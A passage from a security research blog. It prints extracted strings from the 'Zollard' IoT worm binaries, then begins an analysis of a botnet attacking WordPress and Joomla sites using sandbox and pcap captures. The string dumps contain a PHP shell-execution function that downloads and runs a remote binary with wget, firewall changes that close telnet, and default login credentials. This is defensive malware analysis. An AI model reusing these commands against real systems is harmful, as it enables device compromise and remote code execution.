GCC: (GNU) 4.1.2<br />
.shstrtab<br />
.text<br />
.rodata<br />
.data<br />
.bss<br />
.comment</div>
</td> <td><div style="background-color: #eff8fb; color: black; height: 400px; overflow: scroll; scrollbar-base-color: #0489B1; width: 400px;">
<br />
/proc/self/exe<br />
nodes<br />
POST <br />
Host: <br />
User-Agent: Zollard<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: <br />
Connection: close<br />
$disablefunc = @ini_get("disable_functions");<br />
if (!empty($disablefunc))<br />
$disablefunc = str_replace(" ","",$disablefunc);<br />
$disablefunc = explode(",",$disablefunc);<br />
function myshellexec($cmd)<br />
global $disablefunc;<br />
$result = "";<br />
if (!empty($cmd))<br />
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}<br />
elseif (($result = `$cmd`) !== FALSE) {}<br />
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_resource($fp = popen($cmd,"r")))<br />
$result = "";<br />
while(!feof($fp)) {$result .= fread($fp,1024);}<br />
pclose($fp);<br />
return $result;<br />
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");<br />
myshellexec("chmod +x /tmp/x86");<br />
myshellexec("/tmp/x86");<br />
HTTP/1.1 200 OK<br />
httpd<br />
/bin/sh<br />
/proc<br />
/proc/<br />
/stat<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko<br />
iptables -D INPUT -p tcp --dport 23 -j DROP<br />
iptables -A INPUT -p tcp --dport 23 -j DROP<br />
telnetd<br />
/var/run/.lightpid<br />
/var/run/.aidrapid<br />
/var/run/lightpid<br />
/var/run/.lightscan<br />
/var/run/lightscan<br />
/var/run/mipsel<br />
/var/run/mips<br />
/var/run/sh<br />
/var/run/arm<br />
/var/run/ppc<br />
/var/run/m<br />
/var/run/mi<br />
/var/run/s<br />
/var/run/a<br />
/var/run/p<br />
/var/run/msx<br />
/var/run/mx<br />
/var/run/sx<br />
/var/run/ax<br />
/var/run/px<br />
/var/run/32<br />
/var/run/sel<br />
/var/run/pid<br />
/var/run/gcc<br />
/var/run/dev<br />
/var/run/psx<br />
/var/run/mpl<br />
/var/run/mps<br />
/var/run/sph<br />
/var/run/arml<br />
/var/run/mips.l<br />
/var/run/mipsell<br />
/var/run/ppcl<br />
/var/run/shl<br />
/bin/pp<br />
/bin/mi<br />
/bin/mii<br />
/var/tmp/dreams.install.sh<br />
/var/tmp/ep2.ppc<br />
/var/tmp/ep2.mips<br />
/usr/bin/wget<br />
/usr/bin/-wget<br />
/var/run/z<br />
reboot<br />
#!/bin/sh<br />
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot<br />
killall arm ppc mips mipsel<br />
sleep 10<br />
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot<br />
GET / HTTP/1.1<br />
Host: <br />
mips<br />
mipsel<br />
/cgi-bin/php<br />
/cgi-bin/php5<br />
/cgi-bin/php-cgi<br />
/cgi-bin/php.cgi<br />
/cgi-bin/php4<br />
EHW:<br />
p"XW<br />
m > <br />
echo -n > <br />
&& echo -e \\x5A<br />
mkdir -p <br />
/var/run/.zollard/<br />
chmod +x <br />
cp /bin/sh <br />
admin<br />
root<br />
0!0 <br />
SHA1<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
.shstrtab<br />
.reginfo<br />
.text<br />
.rodata<br />
.data.rel.ro<br />
.data<br />
.got<br />
.sbss<br />
.bss<br />
.comment<br />
.mdebug.abi32<br />
.pdr</div>
</td> </tr>
<tr> <td><div style="text-align: center;">
Strings from 'arm' file</div>
</td> <td><div style="text-align: center;">
Strings from 'mips' file</div>
</td></tr>
</tbody></table>
<div style="text-align: left;">
<br /></div>
<table border="1" style="text-align: left;"><tbody>
<tr> <td><div style="background-color: #eff8fb; color: black; height: 400px; overflow: scroll; scrollbar-base-color: #0489B1; width: 400px;">
/proc/self/exe<br />
nodes<br />
POST <br />
Host: <br />
User-Agent: Zollard<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: <br />
Connection: close<br />
$disablefunc = @ini_get("disable_functions");<br />
if (!empty($disablefunc))<br />
$disablefunc = str_replace(" ","",$disablefunc);<br />
$disablefunc = explode(",",$disablefunc);<br />
function myshellexec($cmd)<br />
global $disablefunc;<br />
$result = "";<br />
if (!empty($cmd))<br />
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}<br />
elseif (($result = `$cmd`) !== FALSE) {}<br />
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_resource($fp = popen($cmd,"r")))<br />
$result = "";<br />
while(!feof($fp)) {$result .= fread($fp,1024);}<br />
pclose($fp);<br />
return $result;<br />
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");<br />
myshellexec("chmod +x /tmp/x86");<br />
myshellexec("/tmp/x86");<br />
HTTP/1.1 200 OK<br />
httpd<br />
/bin/sh<br />
/proc<br />
/proc/<br />
/stat<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko<br />
iptables -D INPUT -p tcp --dport 23 -j DROP<br />
iptables -A INPUT -p tcp --dport 23 -j DROP<br />
telnetd<br />
/var/run/.lightpid<br />
/var/run/.aidrapid<br />
/var/run/lightpid<br />
/var/run/.lightscan<br />
/var/run/lightscan<br />
/var/run/mipsel<br />
/var/run/mips<br />
/var/run/sh<br />
/var/run/arm<br />
/var/run/ppc<br />
/var/run/m<br />
/var/run/mi<br />
/var/run/s<br />
/var/run/a<br />
/var/run/p<br />
/var/run/msx<br />
/var/run/mx<br />
/var/run/sx<br />
/var/run/ax<br />
/var/run/px<br />
/var/run/32<br />
/var/run/sel<br />
/var/run/pid<br />
/var/run/gcc<br />
/var/run/dev<br />
/var/run/psx<br />
/var/run/mpl<br />
/var/run/mps<br />
/var/run/sph<br />
/var/run/arml<br />
/var/run/mips.l<br />
/var/run/mipsell<br />
/var/run/ppcl<br />
/var/run/shl<br />
/bin/pp<br />
/bin/mi<br />
/bin/mii<br />
ep2.mips<br />
/var/tmp/dreams.install.sh<br />
/var/tmp/ep2.ppc<br />
/var/tmp/ep2.mips<br />
/usr/bin/wget<br />
/usr/bin/-wget<br />
/var/run/z<br />
reboot<br />
#!/bin/sh<br />
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot<br />
killall arm ppc mips mipsel<br />
sleep 10<br />
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot<br />
GET / HTTP/1.1<br />
Host: <br />
mipsel<br />
/cgi-bin/php<br />
/cgi-bin/php5<br />
/cgi-bin/php-cgi<br />
/cgi-bin/php.cgi<br />
/cgi-bin/php4<br />
EHW:<br />
p"XW<br />
m <br />
GYvh<br />
QdV[3<br />
y8G9<br />
lQ\a< <zh -ne="" -rf="" 0123456789abcdef="" 12345="" 1234="" dreambox="" echo="" rm="" smcadmin="">> <br />
echo -n > <br />
&& echo -e \\x5A<br />
mkdir -p <br />
/var/run/.zollard/<br />
chmod +x <br />
cp /bin/sh <br />
admin<br />
root<br />
0!0 <br />
SHA1<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
.shstrtab<br />
.reginfo<br />
.text<br />
.rodata<br />
.data.rel.ro<br />
.data<br />
.got<br />
.sbss<br />
.bss<br />
.comment<br />
.mdebug.abi32<br />
.pdr<br />
</zh></div>
</td> <td><div style="background-color: #eff8fb; color: black; height: 400px; overflow: scroll; scrollbar-base-color: #0489B1; width: 400px;">
/proc/self/exe<br />
nodes<br />
POST <br />
Host: <br />
User-Agent: Zollard<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: <br />
Connection: close<br />
$disablefunc = @ini_get("disable_functions");<br />
if (!empty($disablefunc))<br />
$disablefunc = str_replace(" ","",$disablefunc);<br />
$disablefunc = explode(",",$disablefunc);<br />
function myshellexec($cmd)<br />
global $disablefunc;<br />
$result = "";<br />
if (!empty($cmd))<br />
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}<br />
elseif (($result = `$cmd`) !== FALSE) {}<br />
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_resource($fp = popen($cmd,"r")))<br />
$result = "";<br />
while(!feof($fp)) {$result .= fread($fp,1024);}<br />
pclose($fp);<br />
return $result;<br />
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");<br />
myshellexec("chmod +x /tmp/x86");<br />
myshellexec("/tmp/x86");<br />
HTTP/1.1 200 OK<br />
httpd<br />
/bin/sh<br />
/proc<br />
/proc/<br />
/stat<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko<br />
iptables -D INPUT -p tcp --dport 23 -j DROP<br />
iptables -A INPUT -p tcp --dport 23 -j DROP<br />
telnetd<br />
/var/run/.lightpid<br />
/var/run/.aidrapid<br />
/var/run/lightpid<br />
/var/run/.lightscan<br />
/var/run/lightscan<br />
/var/run/mipsel<br />
/var/run/mips<br />
/var/run/sh<br />
/var/run/arm<br />
/var/run/ppc<br />
/var/run/m<br />
/var/run/mi<br />
/var/run/s<br />
/var/run/a<br />
/var/run/p<br />
/var/run/msx<br />
/var/run/mx<br />
/var/run/sx<br />
/var/run/ax<br />
/var/run/px<br />
/var/run/32<br />
/var/run/sel<br />
/var/run/pid<br />
/var/run/gcc<br />
/var/run/dev<br />
/var/run/psx<br />
/var/run/mpl<br />
/var/run/mps<br />
/var/run/sph<br />
/var/run/arml<br />
/var/run/mips.l<br />
/var/run/mipsell<br />
/var/run/ppcl<br />
/var/run/shl<br />
/bin/pp<br />
/bin/mi<br />
/bin/mii<br />
ep2.ppc<br />
/var/tmp/dreams.install.sh<br />
/var/tmp/ep2.ppc<br />
/usr/bin/wget<br />
/usr/bin/-wget<br />
/var/run/z<br />
reboot<br />
#!/bin/sh<br />
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot<br />
killall arm ppc mips mipsel<br />
sleep 10<br />
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot<br />
GET / HTTP/1.1<br />
Host: <br />
mips<br />
mipsel<br />
/cgi-bin/php<br />
/cgi-bin/php5<br />
/cgi-bin/php-cgi<br />
/cgi-bin/php.cgi<br />
/cgi-bin/php4<br />
EHW:<br />
p"XW<br />
m<br />
GYvh<br />
QdV[3<br />
y8G9<br />
lQ\a< <zh -ne="" -rf="" 0123456789abcdef="" 12345="" 1234="" dreambox="" echo="" rm="" smcadmin="">> <br />
echo -n > <br />
&& echo -e \\x5A<br />
mkdir -p <br />
/var/run/.zollard/<br />
chmod +x <br />
cp /bin/sh <br />
admin<br />
root<br />
0!0 <br />
SHA1<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
.shstrtab<br />
.text<br />
.rodata<br />
.data<br />
.sbss<br />
.bss<br />
.comment<br />
</zh></div>
</td> </tr>
<tr> <td><div style="text-align: center;">
Strings from 'mipsel' file</div>
</td> <td><div style="text-align: center;">
Strings from 'ppc' file</div>
</td></tr>
</tbody></table>
<table border="1" style="text-align: left;"><tbody>
<tr> <td><div style="background-color: #eff8fb; color: black; height: 400px; overflow: scroll; scrollbar-base-color: #0489B1; width: 800px;">
Host: <br />
User-Agent: Zollard<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: <br />
Connection: close<br />
$disablefunc = @ini_get("disable_functions");<br />
if (!empty($disablefunc))<br />
$disablefunc = str_replace(" ","",$disablefunc);<br />
$disablefunc = explode(",",$disablefunc);<br />
function myshellexec($cmd)<br />
global $disablefunc;<br />
$result = "";<br />
if (!empty($cmd))<br />
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}<br />
elseif (($result = `$cmd`) !== FALSE) {}<br />
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_resource($fp = popen($cmd,"r")))<br />
$result = "";<br />
while(!feof($fp)) {$result .= fread($fp,1024);}<br />
pclose($fp);<br />
return $result;<br />
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");<br />
myshellexec("chmod +x /tmp/x86");<br />
myshellexec("/tmp/x86");<br />
HTTP/1.1 200 OK<br />
httpd<br />
nodes<br />
/bin/sh<br />
GET / HTTP/1.1<br />
Host: <br />
/proc<br />
/proc/<br />
/stat<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko<br />
iptables -D INPUT -p tcp --dport 23 -j DROP<br />
iptables -A INPUT -p tcp --dport 23 -j DROP<br />
telnetd<br />
/var/run/.lightpid<br />
/var/run/.aidrapid<br />
/var/run/lightpid<br />
/var/run/.lightscan<br />
/var/run/lightscan<br />
/var/run/mipsel<br />
/var/run/mips<br />
/var/run/sh<br />
/var/run/arm<br />
/var/run/ppc<br />
/var/run/m<br />
/var/run/mi<br />
/var/run/s<br />
/var/run/a<br />
/var/run/p<br />
/var/run/msx<br />
/var/run/mx<br />
/var/run/sx<br />
/var/run/ax<br />
/var/run/px<br />
/var/run/32<br />
/var/run/sel<br />
/var/run/pid<br />
/var/run/gcc<br />
/var/run/dev<br />
/var/run/psx<br />
/var/run/mpl<br />
/var/run/mps<br />
/var/run/sph<br />
/var/run/arml<br />
/var/run/mips.l<br />
/var/run/mipsell<br />
/var/run/ppcl<br />
/var/run/shl<br />
/bin/pp<br />
/bin/mi<br />
/bin/mii<br />
/var/tmp/dreams.install.sh<br />
/var/tmp/ep2.ppc<br />
/usr/bin/wget<br />
/usr/bin/-wget<br />
/cgi-bin/php<br />
/cgi-bin/php5<br />
/cgi-bin/php-cgi<br />
/cgi-bin/php.cgi<br />
/cgi-bin/php4<br />
EHW:<br />
p"XW<br />
m > <br />
echo -n > <br />
&& echo -e \\x5A<br />
mkdir -p <br />
/var/run/.zollard/<br />
chmod +x <br />
cp /bin/sh <br />
root<br />
1234<br />
12345<br />
dreambox<br />
smcadmin<br />
0!0 <br />
SHA1<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
.shstrtab<br />
.text<br />
.rodata<br />
.data<br />
.bss<br />
.comment</div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: center;">
Strings from 'x86' file<br />
<br />
<div style="text-align: left;">
So who is "Zollard"? What is the relationship between the scanned targets and the original scanner?</div>
<div style="text-align: left;">
There is a good deal more research to be done on this malware, as well as the hosting infrastructure supporting these exploit attempts. At this point, we believe that the malware hosting location is a compromised host, and is not part of this campaign.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
We recommend the blocking of IP address 78.39.232.113 and ensuring that all Internet facing devices, yes "devices" are strongly secured. </div>
<div style="text-align: left;">
<br /></div>
</div>
</div>
Andre M. DiMinohttp://www.blogger.com/profile/07255414624107506662noreply@blogger.com2tag:blogger.com,1999:blog-74827929652568895.post-64744148792418356102013-05-31T23:55:00.000-04:002014-06-04T00:09:24.175-04:00Under this rock... Vulnerable Wordpress/Joomla sites...<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="text-align: center;">
Overview of the RFI botnet malware arsenal</h2>
<div style="border: 0px; margin: 0px; padding: 0px;">
<div style="border: 0px; margin: 0px; padding: 0px;">
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi__wwrG9QpqQAjyxn1-juq6TiHnYggIxbAxtqbyvWqA_a7y-Xc5uQtJTxIJG46_VMx1zo1SWEWl3_uFsILBAa0mm7eOK8OP0jaYIykhdyQNbFre_B9FAdEY7Pyure2DRPO4BYFcG6Yza-/s1600/new-england-aquarium-reef-bottom.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi__wwrG9QpqQAjyxn1-juq6TiHnYggIxbAxtqbyvWqA_a7y-Xc5uQtJTxIJG46_VMx1zo1SWEWl3_uFsILBAa0mm7eOK8OP0jaYIykhdyQNbFre_B9FAdEY7Pyure2DRPO4BYFcG6Yza-/s200/new-england-aquarium-reef-bottom.jpg" height="150" width="200" /></a></span></div>
<span style="font-family: inherit;"><span style="font-family: inherit;">Exploits directed at Wordpress and/or Joomla content management systems(CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are being performed via automated scanners and tools. However, we believe that there is not enough coverage of the actual malware involved.</span></span><br />
<br />
<span style="font-family: inherit;">One such infection scheme is essentially the following:</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">A downloader trojan (Mutopy - Win32) (</span><span style="line-height: 19.984375px;"><a href="https://www.virustotal.com/en/file/20a6ebf61243b760dd65f897236b6ad3/analysis/">20a6ebf61243b760dd65f897236b6ad3 Virustotal</a>)</span><span style="font-family: inherit;"> instructs the infected host to download:</span><br />
<span style="font-family: inherit;">1) Remote File Injector "Symmi" (Win32) </span><a href="https://www.virustotal.com/en/file/012c9b851143df9293b7d1bae1920efb005083df5257e3920d1f524e2c605198/analysis/">7958f73daf4b84e3b00e008258ea2e7a Virustotal<span style="font-family: inherit;"> </span></a><br />
<span style="font-family: inherit;">2) SDbot (Win32) - </span><a href="https://www.virustotal.com/en/file/03cc891a30d06478131e4d7c655a85cd0c2159721838c0adffb5152eb8870a96/analysis/">aaee52bfb589f6534c4b51e3b144dc08 <span style="font-family: inherit;">Virustotal </span></a><br />
<span style="font-family: inherit;">3) <a href="http://www.deependresearch.org/p/file-sm14e.html">PHP scripts for injecting into compromised Wordpress sites.</a> Among them a PHP spambot (victimized site owners often get alerted about copious amount of meds and spam porn emanating from their sites). This is also the source of varied links for spam using thousands of various links redirecting to the same sites (e.g. weightloss, work at home scams, or porn sites)</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The "hackers" attacking the Wordpress servers are armies of compromised windows desktops continuously checking the C&C servers for the new targets. This is the reason why cleaned but not fully patched/secured sites get compromised over and over. It's trivial for a site owner to discover the malicious PHP script on their server. It's much less so to discover how their server was compromised in the first place.</span><br />
<div>
<span style="font-family: inherit;"><br /></span></div>
</div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;"><span style="line-height: 19.984375px;">This will be the first in a series of posts examining various CMS attacks and server compromises that DeepEnd Research continues to track. </span><span style="line-height: 19.984375px;">In this post, we take a quick look at one such attack infrastructure. Our goal in this first post is to simply raise awareness of the malware, domains and hosting providers used in this current attack. At the time of this writing, the infrastructure is actively scanning and exploiting vulnerable sites. <u>With the prompt assistance of Afilias, the domains used in this infrastructure have since been taken down.</u></span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<br /></div>
<div style="border: 0px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: inherit; line-height: 1.428571em;">Executing this sample in a virtualized sandbox environment allowed for RAM to be easily captured, and subsequently analyzed using Volatility v2.2. Examining the network connections active at the time of the RAM snapshot, we observe a number of outbound connections to remote sites on port 80.</span></div>
<div style="border: 0px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<div style="border: 0px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCOdoAH2EUBDjGSf6iWe-ueS8jvjBY3hqa709Q7001uLzzqh-_a_RW6f6Ij2gUW3GrqW9dyO_qK8o58W-4Vt5iuw8XD1LJiLL4B2xKHcIZ-4wD0YwDImEcIR_mYjM-q0pr32LlhoKETVs/s1600/netscan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCOdoAH2EUBDjGSf6iWe-ueS8jvjBY3hqa709Q7001uLzzqh-_a_RW6f6Ij2gUW3GrqW9dyO_qK8o58W-4Vt5iuw8XD1LJiLL4B2xKHcIZ-4wD0YwDImEcIR_mYjM-q0pr32LlhoKETVs/s640/netscan.png" height="314" width="640" /></span></a></div>
<span style="font-family: inherit;"><br /></span></div>
<div style="border: 0px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: inherit; line-height: 1.428571em;">Note that all but two outbound connections were created by </span><i style="font-family: inherit; line-height: 1.428571em;">conhost.exe</i><span style="font-family: inherit; line-height: 1.428571em;"> (PID 3060), while </span><i style="font-family: inherit; line-height: 1.428571em;">mqtgsvc.exe</i><span style="font-family: inherit; line-height: 1.428571em;"> (PID 2968) created the other two. Examining the process list, we see that PID 2968 is the parent of PID 3060, and both are active.</span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<div style="line-height: 1.428571em;">
<span style="font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; line-height: 1.428571em; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5NqY51VobHUyQiFac3C-Yq8eaa4hFlBIffij6PUiDZ0Icl5YSLOuo24E7uDHmzWcTO_djRd1F_4e0vgc9DS2P3fEBmqOdlJflwRKeaQseKY9fLtDusGy39zHdG27lv69jvc4pzB44tKY/s1600/pslist.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5NqY51VobHUyQiFac3C-Yq8eaa4hFlBIffij6PUiDZ0Icl5YSLOuo24E7uDHmzWcTO_djRd1F_4e0vgc9DS2P3fEBmqOdlJflwRKeaQseKY9fLtDusGy39zHdG27lv69jvc4pzB44tKY/s640/pslist.png" height="398" width="640" /></span></a></div>
<div style="line-height: 1.428571em;">
<span style="font-family: inherit;"><br /></span></div>
<span style="font-family: inherit;"><span style="line-height: 1.428571em;">By examining the pcap, we learn that </span><i style="line-height: 1.428571em;">mqtgsvc.exe </i><span style="line-height: 1.428571em;">checks in with domain </span><i style="font-weight: bold; line-height: 19.984375px;">www.wholists.org</i> </span><br />
<span style="font-family: inherit;"><br /></span>
<span style="line-height: 22.84375px;">Unpacked version of conhost.exe </span>7958F73DAF4B84E3B00E008258EA2E7A <span style="line-height: 22.84375px;">contains<i> Base94</i> alphabet, which is being used for encoding strings and communication requests in addition to common <i>Base64</i></span><br />
<h2 style="text-align: left;">
<b><span style="font-family: Courier New, Courier, monospace; font-size: small;"><span style="line-height: 22.84375px;"> </span><span style="line-height: 22.84375px;">!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~</span></span></b></h2>
Examining the pcap shows initial communication with 'www.wholists.org' on 95.163.104.69 - initial callback
<br />
<br />
<div style="background-color: #eff8fb; color: black; height: 150px; overflow: scroll; scrollbar-base-color: #0489B1; width: 780px;">
POST /protocol.php?p=544355219&d=+ldPFacHQRWmAUMZtUAAHfFREUG1RAQdpWxDf6QFQhE= HTTP/1.1<br />
Content-Type: application/x-www-form-urlencoded<br />
Accept: */*<br />
Content-Length: 782<br />
User-Agent: -<br />
Host: www.wholists.org<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache<br />
<br />
d=9kMAR6MOJUHhXRtO9B5McvZUG1PnQQsNrWQASedWQA2tcBNO53wCRf0TCWjYfz98wHw0dMRyIGXPfhtD4VwBT%2FVHLnf6XRZP5EAuY%2BZBAEX9RyRF4UAbT%2F1vIk%2F%2FWhFJ9kAuZetDHk%2FhVgB8wUYcXbVWAlL0Ak938kEcSf1UXx7BVhVJ4EcAWb4NJVL6RxcSvg0xQf1HPVD2XVJb23g%2Bbc9gPWbHZDNy1m8%2FSfBBHVP8VQZ8xFocRPxEAXzQRgBS9l0GdvZBAUn8XS5y5l0PBvZDAEehDiVB4V0bTvQeTHL2VBtT50ELDa1kAEnnVkANrXATTud8AkX9Ewlo2HAnfMB8NHTEciBlz34bQ%2BFcAU%2F1Ry53%2Bl0WT%2BRALmPmQQBF%2FUckReFAG0%2F9byJP%2F1oRSfZALmXrQx5P4VYAfMFGHF21VgJS9ABPd%2FJBHEn9VF8ewVYVSeBHAFm%2BDSVS%2BkcXEr4NMUH9Rz1Q9l1SW9t4J3PPHTZl1XInbMdvIU%2F1RwVB4VYubfpQAE%2FgXBRUz2QbTvdcBVPPcAdS4VYcVMVWAFP6XBx8w1weSfBaF1PPdgpQ%2F1wAReFvIFX9TlRF40EVFK5kE1L9WhxHvg0gRfRaAVThSl8exEEbVPYBXx7QUhxU3EMXTrNIOmvGYC4O13Y0YcZ%2FJnzAXBRU5FIARc9%2BG0PhXAFP9Ucud%2FpdFk%2FkQC5j5kEARf1HJEXhQBtP%2FW8gVf1O<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx<br />
Date: Mon, 27 May 2013 03:27:10 GMT<br />
Content-Type: application/octet-stream<br />
Transfer-Encoding: chunked<br />
Connection: keep-alive<br />
Keep-Alive: timeout=20<br />
<br />
60<br />
..F...@..>xH.G.....E.G.I._\S.\.E.R.P...R.....\.H..\J.TRC.].O.G\E.VR...@..A.N.@.A..]......GC..C.*</div>
<span style="font-family: inherit;"><span style="line-height: 22.84375px;"><br /></span></span>
<span style="font-family: inherit;"><span style="line-height: 22.84375px;">2. </span></span><span style="line-height: 22.84375px;">www.wholists.org directs the infected host to 'gettrial.store-apps.org' where it requests 'conh11.jpg' for download. We see that it's actually a WIN32 executable rather than a JPG file. The file has hash value of 7958f73daf4b84e3b00e008258ea2e7a and is well detected on VirusTotal</span><br />
<div style="background-color: #eff8fb; color: black; height: 200px; overflow: scroll; scrollbar-base-color: #0489B1; width: 780px;">
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">GET /d/conh11.jpg HTTP/1.1</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">User-Agent: -</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Host: gettrial.store-apps.org</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Cache-Control: no-cache</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;"><br /></span></span>
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">HTTP/1.1 200 OK</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Server: nginx</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Date: Mon, 27 May 2013 03:27:11 GMT</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Content-Type: application/octet-stream</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Content-Length: 98304</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Last-Modified: Tue, 14 May 2013 20:21:33 GMT</span></span><br />
